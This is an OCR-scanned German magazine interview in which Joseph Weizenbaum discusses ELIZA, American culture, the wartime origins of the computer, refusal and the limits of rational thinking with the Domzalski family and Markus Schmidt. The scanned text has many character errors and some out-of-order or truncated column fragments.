zalski (Dorothea und Leo Domzalski sowie ihre Söhne Adrian und Oliver Thomas) in Berlin statt, die 
sich ebenfalls an dem Gespräch beteiligten. 


Mit freundlicher Genehmigung dem INFO 3 Magazin entnommen 



Zyange, bevor Weizenbaum mit seinen Büchern 
ein breites Publikum erreichte, hatte er bereits 
einen Namen in der Fachwelt: Mit dem J965 ge¬ 
schriebenen Computerprogramm "Ehza erregte 
er einen Sturm der Entrüstung und des Erstau¬ 
nens. Mit “Eliza” wollte Weizenbaum beweisen, 
daß der Computer eines nicht kann; den Men¬ 
schen als Gesprächspartner des Menschen erset¬ 
zen "Eliza” ist ein sogenanntes “dialogiähiges 
Programm: Dem “Gesprächspartner” am Terini- 
nal wird vorgetäuscht, der Computer verstehe 
seine Aussagen oder Fragen, ja als könne die Ma- 
schine durch ihre pseudoverständnisvollen Rück¬ 
fragen dem menschlichen Gegenüber in seinen 
seelischen Problemen helfen. 

Das Experiment “Eliza” schlug fehl. Allerdings 
nicht etwa, weil das Programm nicht funktioniert 
hätte - im Gegenteii: Viele Menschen glaubten 
an die autonome “Macht der Computer” und 
waren bereit, der Maschine ihre seelischen Proble¬ 
me zu unterbreiten. Der Computer ist geduldig. 
Er steht nicht auf und geht weg, vor ihm kann 
man sich nicht blamieren. Und eine Reihe von 
Joseph Weizenbaums Fachkollegen meinten be¬ 
geistert, endlich den elektronischen Psychothera¬ 
peuten gefunden zu haben, der auch mehrere 
“Patienten” gieichzeitig “behandeln” könne. Es 
war vor allem diese Erfahrung - wie leicht Men¬ 
schen bereit sind, sich der Autorität der Technik 
zu unterwerfen —, die Joseph Weizenbaum zum 


Im amerikanischen Innenleben ist von den Intha- 
nem tatsäclüich sehr wenig übriggeblieben: eimp 
völlig veräußerlichte Feste oder Riten - Tatsache 
ist aber, daß die Indianer ermordet wurden, und 
zwar nicht nur im Äußeren. Darnit hängt viel¬ 
leicht zusammen, daß es in Amerika so gut wie 
kein Geschichtsbewußtsein gibt. Das wird durch 
die Medien noch unterstützt: Völlig zusammen¬ 
hanglos werden die Tagesereignisse nebeneuian- 
dergestellt - ein Sportereignis neben ein 
Eisenbahnunglück in Kalkutta. Wenn zum Bei¬ 
spiel Richard Nixon in den Medien erwähnt wird, 
kommt mit Sicherheit der Zusatz: “formet Pre¬ 
sident of United States”, weil man emfach nicht 
davon ausgehen kann, daß das jemand weiß. 

Die indianische Kultur ist im allgemeinen nur 
noch Entertainment für die amerikanische Be¬ 
völkerung. So muß sich z.B. jeder amerikanische 
Präsident einmal mit einem indianischen Feder¬ 
schmuck fotografieren lassen. Das hat aber über¬ 
haupt keine Bedeutung. Eine bewußte Identifi¬ 
zierung findet da nicht statt. Überhaupt ist das 
Bewußtsein für die indianische Kultur sehr dünn. 
Man weiß von ihr, abstrakt, so abstrakt, wie man 
auch die Entfernung zum Mond kennt. Das hat 
mit dem Innenleben Amerikas nichts zu tun. 


Selfmade-Männer 


damit nicht auch die enormen sozialen Diskre¬ 
panzen in Amerika zusammen? 

Joseph Weizenbaum: Es freut mich sehr, daß Du 
das ansprichst. Du hast völlig recht: Die Verschie¬ 
denheit Amerikas äußert sich natürlich nicht nur 
in der Unterschiedlichkeit der Straßenbilder, son¬ 
dern auch in den sozialen Bereichen. 

Adrian Domzalski: Was mich allerdings wundert: 
Diese verschiedenen sozialen Schichten lassen 
sich durch dasselbe Fernsehen befriedigen. 

Joseph Weizenbaum: Darauf habe ich auch keine 
Antwort. Ich kann da auch nur staunen. Aber es 
ist eine Tatsache: Gerade die Armen haben den 
Fernseher oft als emziges “kulturelles” Angebot. 
Einen alten Fernseher bekommt man schon für 
zehn Dollar, ln den wohlhabenderen Schichten ■ 
übernimmt der Fernseher oft die Funktion des 
Babysitters. Und für die älteren Kinder gibt es ja 
jetzt die Videospiele. Klaus Hafner führt sie 
immer als einen Fortschritt gegenüber dem Fern¬ 
sehen an, weil die Kinder hier nicht nur passiv 
vor dem Kasten sitzen, sondern selbst aktiv wür¬ 
den. Ich kann darauf nur antworten: Bisher 
haben die Kinder ün Fernsehen ein U-Boot ge¬ 
sehen, das torpediert wird, in dem Hunderte von 
Menschen ums Leben kommen. Heute können sie 
nun selbst diejenigen sein, die das U-Boot ab¬ 
schießen. 


“Rufer in der Wüste” werden ließ. 

Sich selbst bezeichnet Weizenbaum als Pessimi¬ 
sten, was die Entwicklung der menschlichen Zivi¬ 
lisation anbelangt; “Kurs auf den Eisberg”. Gera¬ 
de aus dieser negativen Zukunftserwartung aber 
entwickelt er das Recht, ein Hoffender zu sein: 
Nur wer eine positive Entwicklung nicht erwar¬ 
tet, ist imstande, sie zu erhoffen. In diesem Sinne 
wendet sich Joseph Weizenbaum an seine Zeitge¬ 
nossen mit der Aufforderung, das “Wunder” zu 
ermöglichen, welches darin besteht, das Ruder 
jener “Titanic” herumzureißen, auf der er uns 
mit voller Kraft dem Unteigang entgegenfahren 
sieht. Ein “Wunder”, das nicht durch die Ent¬ 
scheidung politischer Würdenträger, sondern 
durch die Verantwortung des Einzelnen bewirkt 
werden kann: Wenn jeder von uns die Bereit¬ 
schaft entwickelt, derjenige zu sein, der das Ru¬ 
der herumreißen könnte, dann haben wir eine 
Chance. 


Markus Schmidt: Die Entwicklung der technolo¬ 
gischen Zivilisation in unserem Jahrhundert ist 
in entscheidendem Maße von den Vereinigten 
Staaten geprägt worden. Hat das vielleicht seinen 
Grund darin, daß einerseits in der amerikanischen 
Geistesgeschichte der europäische kulturelle Ur¬ 
sprung vergessen wurde, andererseits aber die ur¬ 
sprünglich amerikanischen Zivilisationsformen 
Amerikas, die der Indianer, nicht nur nicht auf¬ 
genommen, sondern sogar mit massivster Gewalt 
verdrängt wurden? 


Markus Schmidt: Was ist dann aber das Innen¬ 
leben Amerikas? 

Joseph Weizenbaum: Das Wichtigste am Innen¬ 
leben Amerikas ist, daß es sehr vielgestaltig ist, 
so wie Amerika ja überhaupt sehr unterschied¬ 
liche Seiten hat. Es gibt keinen Oit in den Staa¬ 
ten, von dem man sagen könnte: Das ist das typi¬ 
sche Amerika. Sie sind alle völlig verschieden. Ich 
lebe in Cambridge, Massachusetts und muß täg¬ 
lich erleben, daß ich einfach nicht weiß, was 
Amerika ist. 

Von einem Gesichtspunkt aus gibt es allerdings 
eine “Homogenisierung” Amerikas: in der Wer¬ 
bung und in den Medien. So sind beispielsweise 
die Hotelzimmer der “Holiday Inn"-Hotels über¬ 
all gleich, so daß man sich überall “zuhause” füh¬ 
len soll. Man kann dann nicht mehr unterschei¬ 
den, ob man in Chicago ist oder in Curachi. Und 
auch das Fernsehen bringt überall die gleichen 
Nachrichten. Das ist eine Form der “Vereinigung” 
Amerikas, die völlig trivial ist, die aber doch sehr 
tiefe Konsequenzen hat. 

Dieses Amerika hat nichts mehr mit den Indianer¬ 
mythen zu tun. Es hat auch nichts zu tun mit 
den Pionieren, die nach Amerika einwanderten. 
Im 18., 19. Jahrhundert gab es nach Westen hin 
gewissermaßen eine offene Grenze. Man konnte 
seinem Schicksal entlaufen und neu anfangen. 
Daher stammt die Idee des “Selfmademan”, eine 
der Grundsäulen der amerikanischen Kultur. 


Auf einer leider nur kurzen Reise durch die USA 
hatte ich das starke Erlebnis, daß sich zwischen 
Kultur und Natur in Amerika eine gewaltige 
Kluft befindet. Ein anschauliches Beispiel dafür 
ist San Francisco: Ohne jede Rücksicht auf natür¬ 
lich gewordene Landschaftsformen sind hier die 
Straßenzüge einfach nach einem Rasterplan quer 
über die hügelige Landschaft gebaut worden. 

Joseph Weizenbaum: Ich lebe seit 51 Jaluen in 
den Staaten und kann nur sagen: Ich weiß immer 
noch zu wenig über Amerika, um zu einer sol¬ 
chen Aussage zu kommen. Ich bin mit solchen 
Vereinfachungen sehr vorsichtig. Um auf Ihr Bei¬ 
spiel einzugehen; In Boston sind die Straßen ein¬ 
fach die ausgebauten Kuhpfade, auf denen ehe¬ 
mals die Cowboys ihre Herden getrieben haben. 
Um sich in Boston zurechtzufinden, muß man 
sich auskennen, da kommt man mit Rastern oder 
Mathematik nicht weiter. 


dieser Stelle kann man übrigens einen gewal- 
m Unterschied beispielweise zur japanischen 
itur feststellen; Die Sozialisierung eines neu- 
orenen Kindes geht in Amerika von der Prä- 
;se der völligen Hilflosigkeit des Kindes und 
ler totalen Abhängigkeit von den Eltern aus. 

> Erziehungsziel ist deshalb, das Kind so 
nell wie möglich unabhängig werden zu lassen. 
Japan ist es genau umgekehrt: Hier wird der 
leling gerade in seiner völligen Unabhan^gkeit 
I allen sozialen und gesellschaftlichen Bmdun- 
1 gesehen, und die Erziehung soll nun bewir- 
1 daß das Kind in die Gesellschaft emgebun- 
i’wird. Natürlich ist das in Amerika - und ver- 
itlich auch in Japan - vollkommen unbewußt: 
r*. Aiifpabe der Eltern. 


Dorothea Domzalski: Wese Erziehung zum seif- 
mademan” - das ist doch in gewisser Weise auch 
eine krasse Aufforderung zum Egoismus. Hangen 


Markus Schmidt: Was Sie damit andeuten, ist 
doch, daß sich der Computer aus Vorhergehendem 
entwickelt hat. In Ihren Büchern haben Sie ja oft 
darauf hingewiesen, daß der Computer ein Kind 
des Zweiten Weltkrieges ist . .. 

Joseph Weizenbaum: . . . und des Kalten Krieges! 

Markus Schmidt: Wo ist nun aber der eigentliche 
Ursprung des Computers zu suchen? 

Joseph Weizenbaum: Mir scheint an diesem Ge¬ 
spräch symptomatisch zu sein, wie schnell ivir die 
Indianer vergessen haben. Das ist typisch ameri¬ 
kanisch. Man spricht über die Indianer, wefl es 
sie ja nun einmal gegeben hat — und kehrt zur 
Tagesordnung zurück und zum Computer. Und 
noch etwas soll nicht vergessen werden: Der eben 
angesprochene Freilieitsdrang, der den amerika¬ 
nischen Pionieren nachgesagt wird, ist eine Folge 
der Unterdrückungen, die die Menschen in Euro¬ 
pa erleben mußten. Man darf das nicht idealisie¬ 
ren oder romantisieren. 

Leo Domzalski: Wenige gingen nach Amerika 
um eine bessere Welt zu schaffen, die meisten mit 
der Hoffnung, für sich ein besseres Leben zu 
haben, 

Joseph Weizenbaum: Ein Beispiel sind die Iren- 
Damals herrschte eine Hungersnot in Irland Die 
hatten einfach Hunger! 

Wenn man das mit unserer heutigen Situation 
vergleicht, muß man feststellen, daß die Situation 
Westberlins geradezu symbolisch ist für unsere 
Situation überhaupt: Unsere Gesellschaft ist um 
ringt von einer Mauer. Man kann heute nirht 
mehr “Weggehen”, auch von Amerika nicht Fs 
gjbt das “andere ” Land nicht mehr. ' “ 


Chaos und Abstraktion 

Markus Schmidt: Wenn man das jetzt noch ein 
mal für die amerikanische Gesellschaft betr h” 
tet: Ist es nicht so, daß diese unsichtbare M 
von der Sie sprechen, in den USA auch 
sammenhängt, daß die 2üvllisatlon dort ent t 
den ist einerseits durch den Ausbruch au« 
Traditionen der Alten Welt und andere • 
durch die Verdrängung der ursprünglichen 
nischen Kultur, daß die amerikanische Ki*' 
also gewissermaßen wurzellos schwebt? 





Joseph Weizenbaum: Von dieser Verdrängung 
herrscht aber überhaupt kein Bewußtsein. Die 
Antwort, die man bekommen würde; Es war 
doch nichts da! Als ich 1936 nach Amerika kam, 
kannte ich keine Unterdrückung der Schwarzen, 
weil ich die Schwarzen überhaupt nicht wahr- 
nahm. Sie waren für mich einfach nicht-da. Das 
ist ein Trick, den der Mensch nur zu gut be¬ 
herrscht: Zu verdrängen, was er rucht sehen will. 

Die Pioniere, die 1850 in den Westen zogen, 
hatten diese Fähigkeit, die Indianer — außer in 
den Visieren ihrer Gewehre — zu ignorieren, in 
ungeheuer starkem Maße ausgebildet. Und diese 
Menschen fielen keineswegs vom Himmel: Sie 
kamen eben aus Europa. 

Leo Domzalski: Damit ist ein bestimmtes Ver¬ 
hältnis zur Natur gekennzeichnet: Die Indianer 
wurden als Naturvolk angesehen und die Natur, 
die Wildnis, mußte besiegt werden, Die Folge ist, 
daß die Indianer vertrieben und schlichtweg aus¬ 
gerottet wurden. 

Markus Schmidt: Ich sehe hier doch eine ziem¬ 
lich direkte Linie zur Entstehung des Computers. 
Dieser Drang danach, die “Wildnis”, die man als 
Chaos empfand, durch die Ratio zu ordnen und 
zu beherrschen, den natürlichen Strukturen das 
Merkmal logischer Abstraktion aufzuprägen — 
bildet diese innere Haltung nicht den Boden für 
solche Entwicklungen, die schließlich auch den 
Computer hervorbringen? 

Adrian Domzalski: Könnte man sagen: Wir — als 
Europäer — haben das, was Amerika geworden 
ist, gewissermaßen aus uns herausgesetzt und ver¬ 
drängt? 

Joseph Weizenbaum: Ich glaube, es ist eigentlich 
eine viel allgemeinere Frage, um die es hier geht. 
Es ist die Frage, wo überhaupt Erfindungen her- 
kommen. Es geschieht viel zu schnell, daß man 
der Wissenschaft eine Autonomie zuspricht, die 
eigentlich gar nicht existiert. Insbesondere wäh- 
. rend der faiegszeit gab es durchaus Notwendig¬ 
keiten. Trajektoren von Geschoßbahnen mußten 
berechnet werden, es stellten sich die gewaltigen 
Aufgaben der Logistik, Nachschubversorgung, 
Rüstungsproduktion, Treibstoffversorgung mu߬ 
ten organisiert werden. Da gab es wirtschaftliche 
Notwendigkeiten, und es gab eine Reihe von 
technischen Möglichkeiten; Daraus entstand der 
Computer. Von einer Autonomie der Wissen¬ 
schaft zu sprechen, wäre hier Unsinn. Und es war 
auch durchaus kein Zufall, daß der Computer in 
den USA, Großbritannien und Deutschland 
gleichzeitig entwickelt wurde. Es war eben nur 
Konrad Zuses Pech, daß die Hjtler-Regierung 
nicht erkannte, was er da in den Händen hatte. 

Ein anderes Beispiel ist Robert McNamara, der 
Verteidigungs- (iso eigentlich Kriegs-)minister 
unter John F. Kennedy und Johnson - also wäh¬ 
rend des Vietnamkrieges. Er war ein Kind dieser 
systematischen Kriegsfühmng. Schon im Zweiten 
Weltkrieg war er einer der allerersten, die die 
Logistik der Luftwaffe mit den, damals noch sehr 
anfänglichen, Computermethoden bearbeitet 
haben. 

Von einer autonomen oder freien Erfindung 
kann hier nicht die Rede sein: Es gab einige sehr 
spezielle Aufgaben, die gelöst werden mußten. So 
entstanden die Vorläufer des Computers. 

Verweigerung 

Markus Schmidt: In Ihren Büchern, insbesondere 
in “Kurs auf den Eisberg” kommen Sie bei der 
Frage nach der Lösung der gegenwärtigen Um¬ 
welt- und Technologiekrisen immer wieder auf 
die Verweigerung zu sprechen. Mir ist nun die 
Frage: Aus weichet Motivation kommt man zu 
einer vernünftigen Verweigerung, die die Technik 


in ihre Schranken weist: Bis hierher und nicht 
weiter? Und aus welcher Motivation kann viel¬ 
leicht auch wiedereingegliedert werden, was jahr¬ 
hundertelang verdrängt wurde? Und; Genügt es 
zu verweigern oder braucht man für die Bildung 
einer positiven Zukunftsentwicklung noch etwas 
anderes? 

Joseph Weizenbaum: Um verantwortlich handeln 
zu können, muß man Zeit haben, äch sein zu¬ 
künftiges Verhalten zu überlegen. Wenn diese 
Zeit nicht gewährt wird, dann bleibt einem oft 
nichts anderes übrig, als sich zu verweigern. Die 
Entwicklungen gehen zu schnell: Man hat nicht 
die Zeit, sich gründlich genug zu überlegen: Für 
diesen Zweck sollen die Eisenbahn oder der KUld- 
schrank oder der Computer nicht angewendet 
werden. Man kommt schließlich an einen Punkt, 
wo man nur noch sagen kann; “Aulhören! Slop! 

1 want to get off! Ich brauche Zeit!" 

Die Versuchung, ohne genügende Zeit auszukom¬ 
men, also nur noch Sachzwängen zu folgen, ist 
gewitig. Die Verweigerung sehe ich als eine Art 
Notruf. Nicht, daß ich mich grundsätzlich ver¬ 
weigern wollte. Ich kann aber mein eigenes Ver¬ 
halten nicht verantworten, ohne nachzudenken. 
Ich muß aufhören, um nachdenken zu können: 
Eine Stunde, einen Tag oder ein Jahr. Und in¬ 
zwischen geht die Welt weiter. 

Manchmal scheint es mir fast, als ob es gar kein 
Aufhören geben könnte. 

Dorothea Domzaiskk Ich denke, es kann immer 
nur ein individuelles Aufhören sein. Und das ist 
ja dann auch durchaus etwas Aktives. Damit ver¬ 
bunden kann ja der Wunsch sein, als Mensch ein 
sozialeres Leben zu fuhren, wenn man sieht, in 
welche Isolation der Fernseher oder der Compu¬ 
ter führen. Insofern ist es doch von Nutzen, auf 
diese Drogen zu verzichten. 

Joseph Weizenbaum: Mir fallt immer wieder auf, 
daß gerade die Kinder heute schon viel zu oft vor 
Entscheidungen gestellt werden, ohne wirkEch 
die Tjt H zu haben, sich darauf vorzubereiten, sich 
zu überlegen, was sie eigentlich wollen. Aus die¬ 
ser Not ist der einzige Ausweg oft die Verweige¬ 
rung - einfach aus dem Zeitdruck heraus, in dem 
wir leben. Die Zeit fehlt in unserer Welt, sich vor¬ 
zubereiten, gerade für die Heranwachsenden. 
Dabei haben wir doch nichts anderes als Zeit. 
Wir leben in der Zeit. Aber dann kommen die 
sogenannten Sachzwänge. Was da zwingt, sind 
viel weniger die Sachen als man selber, indem 
man sich gezwungen fühlt. 

Und dann kommt die riesige Versuchung, wenn 
man ein Talent hat, zum Beispiel für Mathematik, 
dieser Begabung einfach nachzugehen, ohne die 
Zeit zu haben, darüber nachzudenken: Was 
macht denn die Muthemulik in unserer Welt 
eigentlich? 

Markus Schmidt: Bei der Frage nach der Verwei¬ 
gerung muß ich an die Situation der ökologischen 
Bewegung in der Bundesrepublik denken: Sie ist 


hervorgegangen aus der Protestbewegung und 
steht nun vor der Frage: Was wollen wir eigent¬ 
lich über den Protest hinaus? Bei den Grünen 
plant man inzwischen einen Stratepekongreß, in 
dem diese Frage im Vordergrund stehen soll. - 
Werm es nun gelingt, sich selbst die Zeit zu neh¬ 
men, die man braucht, um zu entscheiden: Was 
will ich eigentlich? — was macht man mit diesem 
Freiraum? 

Joseph Wehenbaum: Dann hat man es geschafft. 

Markus Schmidt: Damit allein schon? 

Joseph Weizenbaum: Möglicherweise. Das, was 
sich bei den Grünen abspielt, daß sie wissen müs¬ 
sen, was sie tatsächlich wollen, das ist ja auch die 
Aufgabe des Einzelnen. Und das ist eine sehr 
schwierige Aufgabe in dieser Welt, 

Ich habe eine interessante Erfahrung gemacht mit 
meinen vier Kindern; Ungefähr im gleichen Alter 
kamen sie zu mir, um sich in bestimmten Lebens¬ 
situationen Rat zu holen. Und ich habe schlie߬ 
lich allen den gleichen Rat gegeben, ganz ein¬ 
fache Hinweise - aber nicht, weil ich ihn schon 
vorher gewußt hätte: Er hat sich jeweils neu aus 
jeder der einzelnen Situationen entwickelt. 
Worauf ich damit hinweisen will: Es kommt gar 
nicht so sehr darauf an, was im einzelnen für ein 
Resultat entsteht. Viel wichtiger ist es, wie man 
dahin kommt. Der Weg ist das Ziel. 

Letztes Jahr sprach ich auf einer Podiumsdiskus¬ 
sion hier in Berlin von dem Kern aller großen 
Religionen in der Welt; Christentum, Buddhis¬ 
mus, Islam. Sie haben aUe etwas gemeinsam; die 
Liebe. 

Damals hat mir jemand aus dem Publikum das 
Brecht-Zitat entgegengehalten “Erst kommt das 
Fressen, dann kommt die Moral”. Er hatte recht: 
Es geht nicht nur um Liebe, es ist Brot und Liebe, 
was notwendig ist. Es ist für uns, die wir hier in 
einem schönen Haus bei Kaffee und Kuchen zu¬ 
sammensitzen, seht einfach: Wir können uns die 
Zeit nehmen. Das können wir aber nur, weil wir 
das “Fressen” schon haben. Eine große Mehrheit 
der Menschheit hat diese Zeit nicht, weil sie das 
Brot nicht hat. Das darf nicht vergessen werden. 

Markus Schmidt: Wenn Sie Liebe als den Kem 
der Religionen bezeichnen: Können Sie noch 
etwas genauer sagen, was Sie darunter verstehen? 

Joseph Weizenbaum: Nein. 

Markus Schmidt: Man kann also kein Pauschal¬ 
rezept geben für die Liebe. Sie ist jeweils indivi¬ 
duell . . . 


Liebloses Denken 

Joseph Weizenbaum: Das stimmt auch nicht. Die 
Welt ist kein Computer, sie ist nicht binär auf- 





gebaut. Es ist nicht so, daß man es entweder pau¬ 
schal sagen kann oder daß es nur vom Einzelnen 
abhängt. Es gibt hier kein “entweder — oder”! 

Liebe ist eine solche umfassende Idee, sie ist so 
tiefgehend ... — wie könnte man sie in einem 
Satz oder auch in einem Buch oder selbst in einer 
Bücherreihe zum Ausdmck bringen? Und selbst 
die Symphonien, die man in einem ganzen Leben 
schreibt, wenn man Beethoven heißt - eine end¬ 
gültige Definition werden auch sie nicht liefern. 
Obwohl man als Künstler vielleicht am ehesten 
etwas davon zum Ausdruck bringen kann. 

Definieren kann ich die Liebe jedenfalls nicht. 
Bedeutet das dann, daß ich keine Liebe erfahre? 
Ich kann nur sagen: Ich erfahre sie in diesem 
Augenblick. Und wer dazu etwas wissen will, der 
muß mit mir leben. Sagen kann ich es nicht. 

Oliver Thomas Domzakki: Ebenso könnte viel- 
ieicht ein Musiker nicht sagen, was Musik ist. 

Joseph Weizenbaum: Ich muß in diesem Zusam¬ 
menhang oft an die Delphine denken, die ja ein 
ebenso großes und entwickeltes Gehirn haben 
wie der Mensch. Ich frage mich, ob sie überhaupt 
einen Begriff von “Wasser” haben. 

Markus Schmidt: Aber vielleicht kann man doch 
auch mit begrifflichen Hilfsmitteln noch etwas 
näher herankommen. Wir haben vorhin über die 
Armen und die Reichen, die Amerikaner und die 
Europäer gesprochen. Das heißt, wie haben 
abstrakte Begriffe gebildet, die wir über die Reali¬ 
tät stülpen. In gewisser Weise (insbesondere, 
wenn es um soziale Tatsachen geht) ist das doch 
ein liebloses Denken. Vielleicht könnte das eine 
Annäherung sein: Daß man im konkreten einzel¬ 
nen Fall das jeweils Richtige zu tun imstande ist. 
Die Frage ist dann allerdings: Was ist das jeweils 
Richtige und wie kommt man dazu? Ganz be¬ 
stimmt ist es jedenfalls nicht notwendig, es in 
irgendeiner abstrakten Sprache auszudrücken. 

Adrian Domzalski: Ich glaube, man muß hier Be¬ 
griff und Verständnis auseinanderhalten. Einen 
Begriff von Liebe braucht man nicht, genauso¬ 
wenig wie es sinnvoll ist - normalerweise jeden¬ 
falls — einen Begriff von den Körperfunktionen 
zu haben: Wenn ich zu genau darüber nachdächte, 
wie und warum mein Herz schlägt, hätte ich 
Angst, daß es aufhört zu schlagen. 

Joseph Weizenbaum: Auch das Beispiel der Mu¬ 
sik kann hier sicherlich weiterhelfen. Man kann 
sehr wohl wissen, was Musik ist, man kann sogar 
gute und schlechte Musik unterscheiden, ohne sie 
begrifflich zu definieren. Das gleiche gilt übrigens 
auch für die Intelligenz. Über all das - Musik, 
Liebe, Intelligenz - kann man durchaus spre¬ 
chen, man kann es sogar verstehen, auch ohne 
Definitionen. Man muß es erlebt, gelebt haben. 
Sonst weiß man gar nichts, selbst wenn man alle 
Bücher gelesen hätte, die es dazu gibt. 

Markus Schmidt: Wie schützt man sich dann aber 
vor Illusionen? Es geschieht doch sehr leicht, daß 
man meint, man sei ein liebevoller oder auch ge¬ 
rechter Mensch, während im Grunde damit oft 
nur Selbstliebe und Selbstgerechtigkeit bemäntelt 
werden. 

Dorothea Domzalski: Aber schützen davor be¬ 
griffliche Definitionen? 

Joseph Weizenbaum: Die Unterscheidungsfähig- 
keit, durch die man sich vor Illusionen schützt, 
findet man meistens erst im Nachhinein. Im 
aktuellen Augenblick hat man sie meistens noch 
nicht. Wie oft habe ich z.B. gemeint, den “Mac¬ 
beth” von Shakespeare verstanden zu haben. Und 
jedesmal, wenn ich ihn wieder einmal sehe, denke 
ich: Nein, bisher habe ich ihn nicht verstanden, 
aber jetzt verstehe ich ihn! Schließlich, wenn 
man etwas älter wird, stellt man fest: Das Ver¬ 
ständnis gibt es gar nicht. Es ist immer eine Ent¬ 
wicklung. Wieder einmal: Der Weg ist das Ziel. 



Adrian Domzalski: Die Frage nach der Illusion 
kann man ja durchaus auch an die Wissenschaft 
und Technik stellen. Gerade dadurch, daß man 
sich abstrakte Begriffe bildet, entsteht die Illu¬ 
sion, man könnte alles das auch beherrschen, was 
man definiert hat. So glaubt man z.B. nicht 
mehr, ein Gewitter bedeute den Zorn der Götter 
- stattdessen hat man Begriffe davon, wie das 
Wetter funktioniert und meint nun, auch selbst 
in die Wettervorgänge eingreifen zu können. 

Joseph Weizenbaum: Ein sehr gutes Beispiel! Ich 
werde oft gefragt: Was erwartet uns? Wie wird 
sich die Computertechnologie entwickeln? Und 
ich werde in der gleichen Haltung gefragt, wie 
man einen Meteorologen nach dem Wetter von 
morgen fragt! Man glaubt an eine Entwicklung, 
die mit uns als Menschen nichts zu tun hat, die 
sich - wie das Wetter — unabhängig von uns voli- 
zieht. Wieder einmal das Märchen von der auto¬ 
nomen Entwicklung von Wissenschaft und Tech¬ 
nik: Ohne jeden Bezug zum Menschen und zu ge¬ 
sellschaftlichen Zusammenhängen. Das stimmt 
aber nicht! 

Bescheidenheit 

Markus Schmidt: Ich möchte doch noch einmal 
auf das Denken zurückkommen, weil ich den Ein¬ 
druck habe, daß es sehr schlecht weggekommen 
ist. Und ich bin mir nicht sicher, ob man wirklich 
ehrlich ist, wenn man die Fähigkeit des Denkens 
als unwesentlich beiseiteschiebt und sich auf die 
spontane Intuition in der jeweiligen Situation 
verläßt. Oder anders gefragt: Gibt es nicht doch 
eine Möglichkeit, das Denken so weiterzuentwik- 
keln, daß es Positives erzeugt? Daß das Denken 
Schädliches hervorgebracht hat — eine Zivilisa¬ 
tion, die die Natur zerstört, eine Rüstungsmaschi¬ 
nerie rrtit Overkill-Kapazitäten —, das stimmt 
natürlich alles. Aber kann die einzige Konsequenz 
davon sein, mit dem Denken aufzuhören und sich 
auf das Gefühl zutückzuziehen? 


Leo Domzalski: Im Deutschen gibt es den Be¬ 
griff “Denker”. Damit meint man Menschen, die 
wirklich nachdenken über die Welt, das Leben 
Das ist doch eine andere Art von Denken als die 
welche man durch die künstliche Intellieenz 
nachzuahmen versucht. Und ich meine, diese Art 
von Denken ist nicht inflationär, sondern . . . _ 

Markus Schmidt: ... vom Aussterben bedroht! 

Joseph Weizenbaum: Ja, aber dann gerade von 
der Seite des Positivismus und der Comoutertech 
nologie! Es ist ganz klar, wo ich in dieser Fraä" 
stehe: Diese Art von Denken genügt nicht. 
der anderen Seite verkenne ich aber auch nicht 
daß es notwendig ist. Wir müssen rechnen, und 
zwar nicht nur mit Zahlen. Das ist notwe’ndie 
aber es reicht nicht aus. 


Markus Schmidt: Ich bitte um Entschuldigune 

wenn meine Frage jetzt wieder “binär” klüirt’ 
Meines Erachtens zeichnet sich hier aber doch 
eine sehr deutliche Polarität ab: auf der einen 
Seite der rein operationalistische Verstand der 
immer zu einem bestimmten, definierbaren 
Zweck führen wiU. Dieser läßt sich durch de 
Computer scheinbar vom Menschen loslösen Mh 
ergibt sich daraus das Folgende: Der Mensch hat 
etwas aus sich herausgesetzt und ist gerade im 
sten Begriffe, die Gewalt darüber zu verlieren" 
Ein komplexes Computerprogramm ist für d”' 
einzelnen Verstand nicht mehr denkend nächst*' 
vollziehen. - Frage: Was muß dem auf der an^' 
ren Seite entgegengesetzt werden? 

Joseph Weizenbaum: Bescheidenheit! 

Markus Schmidt: Bescheidenheit? 


Notwendigkeit, Zeit zu lassen. Warum ET*? 
Warum muß jeder wissenschaftliche Fortscwi 
sofort m Technologie umgesetzt werden? tfj 
dann sofort vermarktet werden? 


I 


Adrian Domzalski: Mir ist allerdings die Frage, 
ob das Denken heute so sehr der Verteidigung be¬ 
darf. Das rationale Denken zu verteidigen, 
scheint mir so zu sein, als wenn jemand in eine 
ObdachJosenküche ginge und sagte: Leute, über- 
freßt euch nicht! Das Denken scheint mir nicht 
ger.ade vom Aussterben bedroht zu sein. 

Markus Schmidt: Doch, es ist vom Aussterben 
bedroht - und zwar gerade auch in der Compu¬ 
tertechnologie. Da hat man scheuibar einen Be¬ 
reich, wo einem das Denken abgenommen wird, 
was natürlich in Wirklichkeit nicht der Fall ist. 
Man meint aber, man könne Entscheidungs¬ 
prozesse an eine Maschinerie übergeben. 


Was kann man tun? Man muß die WpH 
überzeugen, daß wir solche Eile nir-K» 
haben. Wir brauchen Zeit, um uns zu besinn”'^^® 
als Einzelner und als Gesellschaft Sv®” ~ 
gibt es die drei ersten Hauptgesetze der 
Sicherheit. Das erste ist: die FluBßeschwt„j- . 8' 
beibehalten, das zweite ist: die FluEEeschil-®*^®’' 
keit beibehalten, und das dritte ist- die 
schwindigkeit beibehalten. Dann erst kn 
alle anderen Gesetze der Flugsicherheit. 


So ist es auch mit uns. Wir haben uns 
det - allerdings nicht bewußt: Wenn 
Fluggeschwindigkeit nicht beibehalten 

wir ab. ’ 


eingebü- 
wir die 
Stürzen 


Ich habe nun noch eine Frage an Sie persönlich, 
Professor Weizenbaum: Sie stehen in einem Lehr¬ 
beruf, in dem Sie fortwährend mit Studenten 
umgehen, die im Bereich der Informatik unter¬ 
richtet werden. Daneben aber vertreten Sie eine 
Haltung, die besagt: Worauf es wirklich ankommt, 
ist etwas grundsätzlich anderes. Gibt es für Sie 
Verbindungen zwischen diesen beiden Ebenen 
oder laufen sie gewisseimaßen parallel? 

Joseph Weizenbaum: Ich muß es noch einmal be¬ 
tonen, daß ich nicht glaube, daß sich die Wirk¬ 
lichkeit durch ein binäres “entweder — oder” er¬ 
klären läßt. Ich habe auch nicht den Eindruck, 
daß das Denken in irgendeiner Weise verachtet 
würde. Gerade die Informatiker sind überzeugt 
davon, daß das Denken — und nur das Denken - 
uns retten kann. So zum Beispiel Prof. Marvin 
Minksk, der ganz tief glaubt, daß alles, was wir 
Emotionen und Gefühle nennen, letztlich auf 
rationale Strukturen zurückzuführen ist, und daß 
diese daher auch von Computern bearbeitet und 
simuliert werden können. Viele Kollegen sind 
davon überzeugt, daß es letzten Endes nichts an¬ 
deres gibt als das Denken. 

Markus Schmidt: Sie sprechen jetzt von der 
Ratio. Das meine ich mit “Denken” nicht unbe¬ 
dingt. 


du, wenn du jetzt nicht irgendwo hineeh!? 
we^ du jetzt mellt telefonierst - was fürrih. ’ 
du? Und wenii man das wirklich hinterSa« 
